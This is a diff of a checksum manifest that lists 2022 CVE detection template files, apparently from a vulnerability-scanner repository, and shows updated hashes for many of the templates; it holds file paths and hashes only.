http/cves/2022/CVE-2022-2544.yaml:c85cd47921d9f7756c8d69d7b5cca07fac418257 http/cves/2022/CVE-2022-2546.yaml:a2e33d5ffbe426ee7ed5e3cfb93a5ba86f9ec2dd -http/cves/2022/CVE-2022-25481.yaml:875d1c6eb060ac340e6915f45bde1f73d3cfa0b7 +http/cves/2022/CVE-2022-25481.yaml:96ed77d3722ec662fed47d7cf119155fe8f949d5 http/cves/2022/CVE-2022-25485.yaml:3674f5ab31f186d55843c550fc1e3409ab9dc652 -http/cves/2022/CVE-2022-25486.yaml:a0932a70c15bb4da8ea05cd95260a17f4c722863 +http/cves/2022/CVE-2022-25486.yaml:55eb41fe4b19aed1ec020f317bf553cad2d08f27 http/cves/2022/CVE-2022-25487.yaml:d43a3d5cb5214da4047640272e75ea5be10f777a http/cves/2022/CVE-2022-25488.yaml:a4ae57601c63399470b7d427a5f33f504cac8c1d http/cves/2022/CVE-2022-25489.yaml:b5db606213a95f3496ddf0ddca325d0fac7cf89c http/cves/2022/CVE-2022-25497.yaml:85f1cc928598309a4a7824bb1f1c4cc610a9350e -http/cves/2022/CVE-2022-2551.yaml:10eb42bdc281e19116645f5e022973dd63564ab8 -http/cves/2022/CVE-2022-25568.yaml:d4687736abbf07943b460826e546c359612a1ab1 -http/cves/2022/CVE-2022-2599.yaml:270b9bae2c8526fa6e369d36576b6d252bdd1ea3 -http/cves/2022/CVE-2022-26134.yaml:0ba476625e333febeb7181b4f56295beb6904aa6 -http/cves/2022/CVE-2022-26138.yaml:a945eba2017d2184664842a9c643640577de74f0 -http/cves/2022/CVE-2022-26148.yaml:0b2a0f2a991d7badc10f7d7e15800fc3ac8a0bc9 -http/cves/2022/CVE-2022-26159.yaml:f7ccf7d93d116c7792e2d02a71e49f611204d701 +http/cves/2022/CVE-2022-2551.yaml:d3b4d7b9d0eaef92af04dc8a93d7ed7ed202ab6f +http/cves/2022/CVE-2022-25568.yaml:5d6ffb56ad23afbd593c29a71ffe6c8999a7c251 +http/cves/2022/CVE-2022-2599.yaml:849f43dc530d6bbe8d7789149b1ab17a2a245dcc +http/cves/2022/CVE-2022-26134.yaml:dc6861fca167536ab3abcf852dbe38f6c1a325e8 +http/cves/2022/CVE-2022-26138.yaml:1d80401d0e6b7f4dae42cab3ccc1def86e2ee3d2 +http/cves/2022/CVE-2022-26148.yaml:9f80e7959121453757cd5fec99c757f95e42a3d9 +http/cves/2022/CVE-2022-26159.yaml:446d31f29e3dc17fbd3c64eca54a4feff0de26d2 http/cves/2022/CVE-2022-26233.yaml:d8ccb828f93e31d7bc529cda6b11f29ff9f436db -http/cves/2022/CVE-2022-26263.yaml:7b533a061e2415806704f3504d4d3f16d99751b8 -http/cves/2022/CVE-2022-2627.yaml:e16fe0dcb4d62899d7cf4ab87359c78c8d946511 -http/cves/2022/CVE-2022-2633.yaml:77deafe3608451bec70a1f8a891d2efe3f29c57e +http/cves/2022/CVE-2022-26263.yaml:f5ca6f45aee5270648561ce5ff0befca9e34c4b0 +http/cves/2022/CVE-2022-2627.yaml:00fd4ee070752fc7f62943ec3d48245845dfa026 +http/cves/2022/CVE-2022-2633.yaml:4ebf16d1e6a824d8299336651154dcf53aa6b138 http/cves/2022/CVE-2022-26352.yaml:bc7654fa61427983be547e7d4d15ecae87e3cee5 -http/cves/2022/CVE-2022-26564.yaml:ca883d44e8b06260e94ce79fb8b836f697cae6c8 +http/cves/2022/CVE-2022-26564.yaml:2d0c2c8598581465620d49e3fb6230e3201b652f http/cves/2022/CVE-2022-26833.yaml:901ee9c385a94dddb37c455cc0b90607a6c4ab1a http/cves/2022/CVE-2022-26960.yaml:a1ebb500d8d1f56c40ade43e4b7f7bbcba6421eb -http/cves/2022/CVE-2022-2733.yaml:d102d12e2c056ad15c25e3e5241d04d7ca81d8b9 -http/cves/2022/CVE-2022-2756.yaml:2a4caca91e2ab5fa03c76a7ea69f3841c79812fa -http/cves/2022/CVE-2022-27593.yaml:fd3c05f82a6a9a53b417f8f58790728b15c2f273 +http/cves/2022/CVE-2022-2733.yaml:8ff5f3ca9ce67efd0ed1d1b3589dfdc30c8707c5 +http/cves/2022/CVE-2022-2756.yaml:2444e6891c59f52dc478f9adf1b064d43ca8afb9 +http/cves/2022/CVE-2022-27593.yaml:148edb32eaa88b10e1c6028cae4a2bca2a5c5a57 http/cves/2022/CVE-2022-27849.yaml:97aa8073fe3a8568903eb3a71c29bd8d85b791eb -http/cves/2022/CVE-2022-27926.yaml:4d832deb5f20e16261cf6cea550be36911ed8483 -http/cves/2022/CVE-2022-27927.yaml:49012ca0c2db44f32b8f2a7e9472bf4b8a7ee726 -http/cves/2022/CVE-2022-27984.yaml:db55eaf7800db93fda68e8b91d47f7ca89bb0435 +http/cves/2022/CVE-2022-27926.yaml:0abf3a04244788da9daecb9ec8a96b0d337677bc +http/cves/2022/CVE-2022-27927.yaml:bea706f327a28583fb9c8db4058f93da20e9d66e +http/cves/2022/CVE-2022-27984.yaml:4b1de62b597ff3985b35f4c07f808e20b8e3be75 http/cves/2022/CVE-2022-27985.yaml:7de01fef2fe8a799a34cbfa788042f1cbc888287 http/cves/2022/CVE-2022-28022.yaml:d9e2638306589873983b03d584708ab315752bd1 http/cves/2022/CVE-2022-28023.yaml:5f9b4c0a096aade433c641f9742fe941b1926a1f @@ -2636,13 +2636,13 @@ http/cves/2022/CVE-2022-28032.yaml:ccb20f87bc6749ecd44f76b965233728b440aafc http/cves/2022/CVE-2022-28079.yaml:94a540cee17e3e49ec31c9e828d5ea1c5bdce435 http/cves/2022/CVE-2022-28080.yaml:b0b5afd63a37bec422bfff70a98268b8c051c55c http/cves/2022/CVE-2022-28117.yaml:8db307831c5623c38b79ce199be4310355ea9fb1 -http/cves/2022/CVE-2022-28219.yaml:bd2c8fd047d52e5b78fa3c9e626c351a66a9c98e -http/cves/2022/CVE-2022-28290.yaml:498a2d2d1fb60749180fda77d2e0f6a7edefd8a8 -http/cves/2022/CVE-2022-28363.yaml:be9be527966b777943fd18a7fad328ba723add3e -http/cves/2022/CVE-2022-28365.yaml:cbeb57d05b63ca7e7ed71c694a243c26bc5013cb +http/cves/2022/CVE-2022-28219.yaml:19ff58b55d6f10c6c14a4a4b5e2b882fe9fddc03 +http/cves/2022/CVE-2022-28290.yaml:d237a9c466d3bc5df9ac8711f34db2566a00751e +http/cves/2022/CVE-2022-28363.yaml:97ad02a15d59e811b3f9c6fdc049c199d5a8b4f5 +http/cves/2022/CVE-2022-28365.yaml:37a2646cb10aed30a73d43c316349d48518a1f50 http/cves/2022/CVE-2022-2863.yaml:139e3e14ba32fbce63cd58f9ecdfb55aef7c7556 -http/cves/2022/CVE-2022-28923.yaml:3c0e928360a3f6ce7d591572be57a70cda7bab21 -http/cves/2022/CVE-2022-28955.yaml:cfec548fdc88dcd58adc27a227cd3cc57e414dd1 +http/cves/2022/CVE-2022-28923.yaml:d40fc2730c86f49ee5ca77161ccee467ed346dae +http/cves/2022/CVE-2022-28955.yaml:5ef724508dcf1e4fc67686a2400e42cb1127d9e9 http/cves/2022/CVE-2022-29004.yaml:f17874946822a87c945a95d66ce3bd8130aedba9 http/cves/2022/CVE-2022-29005.yaml:2f778fffde11c62061dd7818fbae94aa0e3b44f3 http/cves/2022/CVE-2022-29006.yaml:b268213d79842b66f50476a81610d504e9df9a03 @@ -2651,41 +2651,41 @@ http/cves/2022/CVE-2022-29009.yaml:5b59e01a1574bdcf05aee421722002bfeedc1eaf http/cves/2022/CVE-2022-29013.yaml:aa822f0d3d9c552b38ee8e0d6f24416d6fc52cca http/cves/2022/CVE-2022-29014.yaml:d7fe9eba13214850635cedd9df08b509ed93f30c http/cves/2022/CVE-2022-29078.yaml:0d9401a7ca4b569db1fa80884acc0201e4534493 -http/cves/2022/CVE-2022-29153.yaml:b15115024bb84800ab1ab651e03f9cbd7d9bf4f7 -http/cves/2022/CVE-2022-29272.yaml:cd3b6aa252363752eaafd7a3538e6d7f55b31555 -http/cves/2022/CVE-2022-29298.yaml:1e1458f7bee211ebd1e4ca79f4f84a417f85f358 -http/cves/2022/CVE-2022-29299.yaml:ce1bab0105d7ce860c511ebb5870f4e92bfe7642 +http/cves/2022/CVE-2022-29153.yaml:8deb5eed1e575971e430b1cb309e7c2c74a650e8 +http/cves/2022/CVE-2022-29272.yaml:0b04cec71a246d42c7cfd03d2e2146265691e3de +http/cves/2022/CVE-2022-29298.yaml:dbb673cf30a552d25f26c4dfc4517001f5a6e919 +http/cves/2022/CVE-2022-29299.yaml:1ca6e99d21f0cab9e13d0b8dd036d3a0c4870b06 http/cves/2022/CVE-2022-29301.yaml:00fdd854b16529833bddf7e7a6d5271787eb2868 -http/cves/2022/CVE-2022-29303.yaml:4c2ecdff589a1d5d62eac916d72657067471437e -http/cves/2022/CVE-2022-29349.yaml:7a7997b5b1a22291f10e02baa8fedf049bfcd7cf +http/cves/2022/CVE-2022-29303.yaml:c9c5b14f0e58fbe54487055dabe6dc4aa16def00 +http/cves/2022/CVE-2022-29349.yaml:b790d4312b2aa1d76563e404a65755d692fdbc2b http/cves/2022/CVE-2022-29383.yaml:1f1a67523a657132055661ca16b0d5671ea8681c http/cves/2022/CVE-2022-29455.yaml:929c2512832cab6541789b6b561df0d8477498f8 http/cves/2022/CVE-2022-29464.yaml:f8d21f5853ad6bdd504ca36d9ab62f11e5b13197 -http/cves/2022/CVE-2022-29548.yaml:471576ef16117bc5752712103197c7904d2cf8bc -http/cves/2022/CVE-2022-29775.yaml:40a20f815f8b8b500a12d44b8db06c5db0eac062 +http/cves/2022/CVE-2022-29548.yaml:c0d675bb0d88aae5acd5c248d08ac50dbea7accb +http/cves/2022/CVE-2022-29775.yaml:0a38f6ad97393cc229eb06ab48be372286f0392f http/cves/2022/CVE-2022-30073.yaml:25c2c48bff67d81f85a53d466f20fc59708f5de8 -http/cves/2022/CVE-2022-30489.yaml:b1fa77158a270fb7f404bd3480725c30a8a118df +http/cves/2022/CVE-2022-30489.yaml:4c383cec4948729006f10da1523a6f4a347011d7 http/cves/2022/CVE-2022-30512.yaml:638d83b05fc1d498deb992b8d6009fc381ab4e09 http/cves/2022/CVE-2022-30513.yaml:5055c09b0c1d4e099eb82a75362336552b084bd5 -http/cves/2022/CVE-2022-30514.yaml:db051fe1884de0f974f3b703f24163c318949187 -http/cves/2022/CVE-2022-30525.yaml:48f4123237e13d657ef47822299743831e3c2175 +http/cves/2022/CVE-2022-30514.yaml:6388b1144180c0be10bbde2eb06e573303de2e76 +http/cves/2022/CVE-2022-30525.yaml:baaa8062705fb559ebb056ffa34a02a15f3417da http/cves/2022/CVE-2022-3062.yaml:fcda96c1f8a7c5adddaf9cb68e11a534813d3988 -http/cves/2022/CVE-2022-30776.yaml:1711282c9f5e683b6e5af8377021e3a72a099c68 -http/cves/2022/CVE-2022-30777.yaml:9d34296638d42e80102346ecc51760a039cf5b0d -http/cves/2022/CVE-2022-31126.yaml:61fcf039f88cb321b27eeeb19f3cab2d525b93aa -http/cves/2022/CVE-2022-31268.yaml:5cb84b7d1075133a6e41e4b01f3f11340cb253e0 -http/cves/2022/CVE-2022-31269.yaml:ce4ed9716f6f1e18f41f688814ea9b8788aefc99 +http/cves/2022/CVE-2022-30776.yaml:8acd0b4196f7af09f46c2df0df93a7194bf6e004 +http/cves/2022/CVE-2022-30777.yaml:00b8569c7dc99e2ffa589832822a460d61e54690 +http/cves/2022/CVE-2022-31126.yaml:a64c17c75d951b2a909938d15346f6970cda3a67 +http/cves/2022/CVE-2022-31268.yaml:ecbacb22f4b8dacedd90a0cf530fadf1e5728e23 +http/cves/2022/CVE-2022-31269.yaml:97f5463ade182b7e38609ca4ecee6b5e225f5408 http/cves/2022/CVE-2022-31299.yaml:83e0fce7d1de1b228595ffa36be5d64ee8aef870 -http/cves/2022/CVE-2022-31373.yaml:80a9f97c074bec27c2f12e3d71ccfeba3ef43720 -http/cves/2022/CVE-2022-3142.yaml:14f9829213ff264696eb61d69ea2b972bb42cb64 +http/cves/2022/CVE-2022-31373.yaml:516aeaded54bc1c8e341245e8eb1ba5888f6bfe4 +http/cves/2022/CVE-2022-3142.yaml:8238b5f11da14fbc677d59f77c5ede0eb4c119b6 http/cves/2022/CVE-2022-31474.yaml:ea47cd03d542d4c58da04a90b5803dfd9f2997e2 -http/cves/2022/CVE-2022-31499.yaml:4d31124ce95d6944901f830be98fcd248d1063fe -http/cves/2022/CVE-2022-31656.yaml:4f30cd76f409f2d8c78791a606c98132255c5db6 -http/cves/2022/CVE-2022-31798.yaml:9c2c29582d6febb439a6b054e5ed7fafa8fcd0cc +http/cves/2022/CVE-2022-31499.yaml:7336edf5e9e7fb4de44620a43d44e7c5e10b6875 +http/cves/2022/CVE-2022-31656.yaml:7878149bec1de85224faca256c8f2ab264910eab +http/cves/2022/CVE-2022-31798.yaml:ab96c6fe92540cc08a9f6becaae81d96d7086b6d http/cves/2022/CVE-2022-31814.yaml:118097ce6da0a7e663d4890d0e8b786af80c65fe -http/cves/2022/CVE-2022-31845.yaml:0df411b0998b8c84848343c79ea3840563e95f3d -http/cves/2022/CVE-2022-31846.yaml:83060beb2a8c760ef15aa11d1e4fc16632602144 -http/cves/2022/CVE-2022-31847.yaml:c715f2c1bfbcd32a5becb5265c6ae27c1d061491 +http/cves/2022/CVE-2022-31845.yaml:ec3fe5cef35c14a3b17bfc74394a8526541a69a6 +http/cves/2022/CVE-2022-31846.yaml:0f8b63bac39ca1c09d571aba5e699ed957872cac +http/cves/2022/CVE-2022-31847.yaml:da369cafe875e0fc818b4606871854c77f11511b http/cves/2022/CVE-2022-31854.yaml:365c4ced58a37e3d0f041bab452270ada3fc3a3a http/cves/2022/CVE-2022-31879.yaml:cf56507b017fd380640d0260a4b002f977f727f7 http/cves/2022/CVE-2022-31974.yaml:6711ff86f730445184c93c2a91a32daf2af56723 @@ -2701,185 +2701,185 @@ http/cves/2022/CVE-2022-31984.yaml:b6dabf331f1f42e3dfb65cf34469dabc48c5cdb5 http/cves/2022/CVE-2022-32007.yaml:e906645b18647cd54049b516c600dcb45757027f http/cves/2022/CVE-2022-32015.yaml:dfa56cfa49faf125c0eb6a8658b2e4edb2dce48e http/cves/2022/CVE-2022-32018.yaml:8bce734f6dd5d9598eb3e5e11810b016ad428347 -http/cves/2022/CVE-2022-32022.yaml:2d8af7c581fc24f2ba0cafeb94b9597d43fd3927 -http/cves/2022/CVE-2022-32024.yaml:10535fec2a95e6001580bdaf0a7ac2c9b225ff69 -http/cves/2022/CVE-2022-32025.yaml:245d51620ac2618b60abc12b2e73731ac954acec -http/cves/2022/CVE-2022-32026.yaml:7c9d5aa9047a8bb719d1d1e688cb507f523d4887 -http/cves/2022/CVE-2022-32028.yaml:1b3834f96e60f4d8afbeef2e28c92d0a21bf7f31 -http/cves/2022/CVE-2022-32094.yaml:1ad5b7439d115638d469578b7318238ab9fd9d18 -http/cves/2022/CVE-2022-32195.yaml:df2b6c46a5cf6f00671594b51516c2ac7c102cce +http/cves/2022/CVE-2022-32022.yaml:dc84e6ef40a8e861ccb0706c60fe8617ddb77be9 +http/cves/2022/CVE-2022-32024.yaml:e444abfc18392ac64eb446b47ad409e1a1c30e85 +http/cves/2022/CVE-2022-32025.yaml:137dae66b809d9f11c34d60494e3d2ff0651c027 +http/cves/2022/CVE-2022-32026.yaml:1891e79a8315390f7bd3f1969d52ff17d13a614a +http/cves/2022/CVE-2022-32028.yaml:215637fb80275ea75ed2f87a56df591695815d87 +http/cves/2022/CVE-2022-32094.yaml:6e66d2595571820350b72335962da3fdc3093f38 +http/cves/2022/CVE-2022-32195.yaml:998f425f674b8e99f9d0cd7e43709365a6ce8835 http/cves/2022/CVE-2022-32409.yaml:295d70cb0faaddb5f74f6ce9681439616f8c0dc6 -http/cves/2022/CVE-2022-3242.yaml:ced08d881db5324c5115fde2dab2b0e456ed2108 +http/cves/2022/CVE-2022-3242.yaml:6bedba52ce8e49c9fd999f929d942989b0d1ecf4 http/cves/2022/CVE-2022-32429.yaml:59de8ad5ce3fd0c50c5bf65b45ba3d09922c29cb -http/cves/2022/CVE-2022-32430.yaml:36ac13697a3560571ba2278a83a1ef605ebca7fe +http/cves/2022/CVE-2022-32430.yaml:888da05ebe93b8f729842a449255b550078fcaab http/cves/2022/CVE-2022-32444.yaml:90993fc37397f25237a76f27bd790afb3a51e06b -http/cves/2022/CVE-2022-32770.yaml:73907810660162c77bdfc6edbf4baab1f477adaa -http/cves/2022/CVE-2022-32771.yaml:7219050e33108e91a8879f66ed2303935e24bc9a -http/cves/2022/CVE-2022-32772.yaml:ef692cead68b60c5d86415c6c351ceb8267f5383 -http/cves/2022/CVE-2022-33119.yaml:19f911d90926a7e8f7824593606e007df7d81be8 -http/cves/2022/CVE-2022-33174.yaml:a0d171b83f1364c4749a3820cd831f49b6030efa -http/cves/2022/CVE-2022-33891.yaml:9ca89afb27f487827acfa37577d3f86200991e5b +http/cves/2022/CVE-2022-32770.yaml:33c5be581da1a8b53e4a6769eb8f4e6c2cada7a1 +http/cves/2022/CVE-2022-32771.yaml:5aa18f00d68893c96f04d6afca7e31746fafd360 +http/cves/2022/CVE-2022-32772.yaml:455eec394a3a4593674cec734636cf20137f208e +http/cves/2022/CVE-2022-33119.yaml:18032268085b0eb3b5ea4924c908a4f969146db3 +http/cves/2022/CVE-2022-33174.yaml:45e958568134a9140a920d11a7ee6a5f45349217 +http/cves/2022/CVE-2022-33891.yaml:bd5e63e0d14bae639a59b73501625964d68dc3af http/cves/2022/CVE-2022-33901.yaml:fa27ea080559ed96840da6b82a590142f01096ec -http/cves/2022/CVE-2022-33965.yaml:d78e389d3d2c80d65098d401a42d7e4215ed34aa -http/cves/2022/CVE-2022-34045.yaml:c0514fa2592357886ac5d18ac6a7c746319a3fcd -http/cves/2022/CVE-2022-34046.yaml:4a512e4db920f734fbd96aba2df599b4ef631baa -http/cves/2022/CVE-2022-34047.yaml:dad4c506c36493c70ceeaf4dc484f00f4f84d2a3 -http/cves/2022/CVE-2022-34048.yaml:739453c8e719c3ccfa7552a96dda80d85752bca1 -http/cves/2022/CVE-2022-34049.yaml:d727455be9f784f77b72b49b444927323e2a1634 +http/cves/2022/CVE-2022-33965.yaml:a695a45b7cb1756279de1a2e31cf893d9dfe333c +http/cves/2022/CVE-2022-34045.yaml:4343214ad608a8bca66eb41725f14126a70d482f +http/cves/2022/CVE-2022-34046.yaml:1e5ce68d8c918b2d9b4779edc79ed55c9723502a +http/cves/2022/CVE-2022-34047.yaml:f2aa7e2943c9d21b62b53d16bf71e5b3044f9ec5 +http/cves/2022/CVE-2022-34048.yaml:e8c0e678ec279419207e35b29f257e1b2c5d1679 +http/cves/2022/CVE-2022-34049.yaml:50c3e971603a6b6b59cf47ea353d59db6ce9a94e http/cves/2022/CVE-2022-34093.yaml:507d9374130389cd1aec5b58c6adb274020e93c7 http/cves/2022/CVE-2022-34094.yaml:532360cc425c43471f60b0c3a4668b2b416ba392 http/cves/2022/CVE-2022-34121.yaml:dbea363aeb740fe3e7119e4e1fdb4a7c39c07d28 -http/cves/2022/CVE-2022-34328.yaml:e5fe55725c21f813cdeaa60333bfb7460d14468b -http/cves/2022/CVE-2022-34534.yaml:5125f4291925c374f6090cdac712ac1c6195e2fe -http/cves/2022/CVE-2022-34576.yaml:33a2c61f9ebcafb39eff3aee45b50fb41b823d90 -http/cves/2022/CVE-2022-34590.yaml:0bf19820c8498fa9ccc5faa61dc810597332542a -http/cves/2022/CVE-2022-34753.yaml:289ecf60add9ae7a411994000b70c265d5c3132a +http/cves/2022/CVE-2022-34328.yaml:bcf3e8505f0ea0d20573124187336e6991c961aa +http/cves/2022/CVE-2022-34534.yaml:2bbe4596a2683f6464b9c40222fdd20c944edc8e +http/cves/2022/CVE-2022-34576.yaml:c9eb8acdc06081e67f0d7f015281f30f203eea51 +http/cves/2022/CVE-2022-34590.yaml:ed1531f591be19323d4f5df0712b36c6bfd2fce5 +http/cves/2022/CVE-2022-34753.yaml:71d50bf4e4acb55ce83ab0f63d794bd971f95844 http/cves/2022/CVE-2022-3484.yaml:9b14f907cb7136b5784b38fcad2ea5ad3616ad6b -http/cves/2022/CVE-2022-3506.yaml:eefe91eddcc3d58c5707abde390d7ed3f7163ef1 -http/cves/2022/CVE-2022-35151.yaml:ef3efa5526ba9e67aad1b3cecaffe0bf7ff7c750 -http/cves/2022/CVE-2022-35405.yaml:fbf604e6c0fe24c0f30b6890c63cbf2b69a1e379 -http/cves/2022/CVE-2022-35413.yaml:55e6ea2f986fe75cf76b28219c9b3d03ae6bb233 +http/cves/2022/CVE-2022-3506.yaml:4b74a98a295baf18696a4145043a7138c190f925 +http/cves/2022/CVE-2022-35151.yaml:1dee5266a6fe30ca05b543e19a63bfc1d06f63c7 +http/cves/2022/CVE-2022-35405.yaml:b0173d15c30605e4f2205214a0871e31eb0dd322 +http/cves/2022/CVE-2022-35413.yaml:3f372b42464d638bea0da0573312bba12510341e http/cves/2022/CVE-2022-35416.yaml:ba270b48da401279206d5f902bbe73ca36541510 -http/cves/2022/CVE-2022-35493.yaml:378f8cf705e26cad6e1d2f1664c9e81f0f053ffb -http/cves/2022/CVE-2022-35653.yaml:bee4c663f69f76c7276be665e89a9047f827730f +http/cves/2022/CVE-2022-35493.yaml:1a510b745d56a950c268cf2e0c6a7641e8567b88 +http/cves/2022/CVE-2022-35653.yaml:471e71af52b2016a93691b1d0dac298788f1d6d8 http/cves/2022/CVE-2022-3578.yaml:cf4906cde10fe488bbdf473de15bb5d018745939 -http/cves/2022/CVE-2022-35914.yaml:6de43368ac4c9311cb180aeef0eaa6143355d8fd -http/cves/2022/CVE-2022-36446.yaml:b7633b4bf4718b6000edfd9e9e52715b55d6ce7f -http/cves/2022/CVE-2022-36537.yaml:d39094e117f3ced058490e36a49c92a5c0345f16 -http/cves/2022/CVE-2022-36553.yaml:e062fd460c656b568847a5e48e98da1d12482850 -http/cves/2022/CVE-2022-36642.yaml:059728c51bf05320c5efec19764a98aff3fd4866 +http/cves/2022/CVE-2022-35914.yaml:cb20ef72dc328bf515f5049968cc334103451d7e +http/cves/2022/CVE-2022-36446.yaml:353c3190a3f8d375c693051d20fc2160e9aaa9a9 +http/cves/2022/CVE-2022-36537.yaml:80c128feeca028db35b08e0548acc4895ccd2814 +http/cves/2022/CVE-2022-36553.yaml:869cc6bd636251787da80b5eaef2cb69f0934607 +http/cves/2022/CVE-2022-36642.yaml:0fd1e6189b31862cb40a5e82601876e2baf912d7 http/cves/2022/CVE-2022-36804.yaml:f5b29c0c01d220a9aa152ff0f0146ef72e129f53 -http/cves/2022/CVE-2022-36883.yaml:5b50fe6072d5b625e52e0dcba248ce68b94a3c62 -http/cves/2022/CVE-2022-37042.yaml:aea26b50f98d971c4cd697f432aa1db21abda9e0 -http/cves/2022/CVE-2022-37153.yaml:c4b038395093bd1377bcb195e8cef12ad272cdc7 +http/cves/2022/CVE-2022-36883.yaml:9d63a9850f9d98fa2337a49e1ac18adbaeab9bef +http/cves/2022/CVE-2022-37042.yaml:a9c2e6dea960a7839bb40bb320b6238da40fc35d +http/cves/2022/CVE-2022-37153.yaml:cdc45f66feef7319c4587fa1dffba8487e27a691 http/cves/2022/CVE-2022-37190.yaml:a299ef58e490ff88c6c34e29fc02f2de7c2f2ef2 -http/cves/2022/CVE-2022-37191.yaml:28c6f350050f91f878eb4677c5a54f1fa9fba6d9 +http/cves/2022/CVE-2022-37191.yaml:0c57a701c1c9067c702ef5d40ca23448a58f6709 http/cves/2022/CVE-2022-37299.yaml:0a3f30c80ce167733cb1a4432f2090d7d8715a62 http/cves/2022/CVE-2022-3768.yaml:8c9f9736507f827359a08f4f70e83cfa05cd3e2a -http/cves/2022/CVE-2022-3800.yaml:952d94e1198a767a19d3a11474b0e4ac6de8c572 -http/cves/2022/CVE-2022-38131.yaml:8c5444063337def0da743cdb0bed77c431a19ced -http/cves/2022/CVE-2022-38295.yaml:9334bfbe2358d14708f7938ca0eb811c6e265bfd -http/cves/2022/CVE-2022-38296.yaml:f45209b0c373d5e1aa7a2b88fd2fad70c34d9bd6 -http/cves/2022/CVE-2022-38463.yaml:02bcaaa35f0666a69fe3c0660084bd23d492f6ed -http/cves/2022/CVE-2022-38467.yaml:d9154780963b6c660dd351baac367f903cd17368 -http/cves/2022/CVE-2022-38553.yaml:529fecbe264713124ecc2279528c18771b774f5d -http/cves/2022/CVE-2022-38637.yaml:89ac02b50a62e40cec492ce52b97c86dc11eb887 +http/cves/2022/CVE-2022-3800.yaml:a700c9264ffbedb46a2f3a22ec7e98be500097c5 +http/cves/2022/CVE-2022-38131.yaml:49cadbb0bb2d72895fe3281f98c67e1332d50025 +http/cves/2022/CVE-2022-38295.yaml:e935234c93f236f44ebedc6ec81801116b26d54b +http/cves/2022/CVE-2022-38296.yaml:236c15b302eedb112d21bc64a388b0d716416755 +http/cves/2022/CVE-2022-38463.yaml:70a4b47b359c9e8ee1b0ce6199a3b6025de0d330 +http/cves/2022/CVE-2022-38467.yaml:4169be779f0b8254f3f7ce902339096ba486b03c +http/cves/2022/CVE-2022-38553.yaml:6bb6d72813bfba832f77273ab2d04a4c7ce2d5bf +http/cves/2022/CVE-2022-38637.yaml:8b1d6a3a668704eea52a3e052bba4212c0c43e75 http/cves/2022/CVE-2022-38794.yaml:d5a7bc3e97c053bc014490f0dc3b18ce3939ed76 -http/cves/2022/CVE-2022-38817.yaml:c3658089c55341de4458c362e91ba43ff9404da4 -http/cves/2022/CVE-2022-38870.yaml:34b92486761edaa35c5c1acc31fc8bc51a25f5cf -http/cves/2022/CVE-2022-39048.yaml:e5ea0c23e54edcef95895bb8f216020d6793b368 +http/cves/2022/CVE-2022-38817.yaml:512bd964a93f965d6309f1dae2539060d6ec9489 +http/cves/2022/CVE-2022-38870.yaml:1520221ca7192a8a45cf28e38ede67de86873803 +http/cves/2022/CVE-2022-39048.yaml:e6a7f874b57be2757ee0dd5df7f8239ad6d40e99 http/cves/2022/CVE-2022-3908.yaml:7a24ebd5708610556552ab3053544addd76e9dc2 -http/cves/2022/CVE-2022-39195.yaml:d2428cdef029d2bfbb25b35961f2d99581000266 +http/cves/2022/CVE-2022-39195.yaml:a7634c740328e7f3a1f5db7fbe1f2480ba65ee9b http/cves/2022/CVE-2022-3933.yaml:8bdf9fc2cc672a6ceeadc95a0bb890ab17396398 http/cves/2022/CVE-2022-3934.yaml:e1abcd7b986d2f3622f65200fdc1412374c8f640 -http/cves/2022/CVE-2022-3980.yaml:fe377c4ec20264a5590c2ba8a02eb6e916da0d40 +http/cves/2022/CVE-2022-3980.yaml:cbf60ef042e800e1ef1f6d75460f4304cc6f7f5b http/cves/2022/CVE-2022-3982.yaml:e8d1d3ef09716ea6385568e088d5bf7ff4c30d20 -http/cves/2022/CVE-2022-39952.yaml:219ec3aa4592c668225fd5fc51067e024ec98019 -http/cves/2022/CVE-2022-39960.yaml:dcd604f037a1411311b34f19da294ec703b62600 +http/cves/2022/CVE-2022-39952.yaml:cf194c8f311427424901178f2298c0da51409f3d +http/cves/2022/CVE-2022-39960.yaml:1e72216affc3f0956d3cd701fb326796baf6a4f9 http/cves/2022/CVE-2022-39986.yaml:92d7db86d01d2771b7880f9c440feb8e62b94de2 http/cves/2022/CVE-2022-40022.yaml:64a838eb51b5a1c34c5b17e74f1fe233cbcc24ae http/cves/2022/CVE-2022-40032.yaml:457b3c849fc450b8c4f39efc48b93f39e9a2c9ab -http/cves/2022/CVE-2022-40047.yaml:9c4e99c90d7c7b6c2c98971d55c8607c20833f78 +http/cves/2022/CVE-2022-40047.yaml:2931bef5361cf87ba2274ccc6090dde8328e2440 http/cves/2022/CVE-2022-40083.yaml:333acecbc6c71ec844ded8fbdc5e2de95af9e34e -http/cves/2022/CVE-2022-40127.yaml:82fdc6e122cfa42a321bf0bfa625ce65d44c7e14 +http/cves/2022/CVE-2022-40127.yaml:1c30549f833d342dd280fd26686b3181fb9af4f1 http/cves/2022/CVE-2022-40359.yaml:ddd501f8d916d909938c17ccf6492dc2e2c7d812 -http/cves/2022/CVE-2022-4049.yaml:ab8b78a75bead4b89b00ae11c6f7e0a6d53e519d +http/cves/2022/CVE-2022-4049.yaml:71b2b7b27ae4951eac04543b6c9bb1a79044079e http/cves/2022/CVE-2022-4050.yaml:054b17311703abba376a3fceb0279ec9e86bbb01 -http/cves/2022/CVE-2022-4057.yaml:ad0a36b5b6846b84a9a4352c367212b956c24702 -http/cves/2022/CVE-2022-4059.yaml:ea49e9ac12bd91bab3398d52f2ee319003dc1949 +http/cves/2022/CVE-2022-4057.yaml:f9ed01b5d367fe19da6614416acba1eb86ff9fff +http/cves/2022/CVE-2022-4059.yaml:1770b6465e74d136837d297e5e2702bd1798dd4d http/cves/2022/CVE-2022-4060.yaml:4564f0fd4f8ed6221de40ce6673f81c2c9453e8c http/cves/2022/CVE-2022-4063.yaml:4fc58e6992b32c1e2e2a0d1c78934dfb336aa6d5 http/cves/2022/CVE-2022-40684.yaml:9f201c8f2b14b43cff542ef33691c0622eabc992 -http/cves/2022/CVE-2022-40734.yaml:bfccbbb52f8c591d5b9da8e28dee81b69a08e950 +http/cves/2022/CVE-2022-40734.yaml:5cc77b9ffdaa6feccc3286403f9038b56c2a0905 http/cves/2022/CVE-2022-40843.yaml:6b26b625e95244fe922bfcf60035ca2c72221ce2 -http/cves/2022/CVE-2022-40879.yaml:5be8840f1f78b0c6b6e793bd74f811b4a503aac5 -http/cves/2022/CVE-2022-40881.yaml:3351fb5b6cce43fc92f7fc29cda1823c858406ef +http/cves/2022/CVE-2022-40879.yaml:e89d1e513a230e2184265c0d52d19ca99e6157d9 +http/cves/2022/CVE-2022-40881.yaml:818fdd9b2d0d190ad80722e09c6fb16e2a26d681 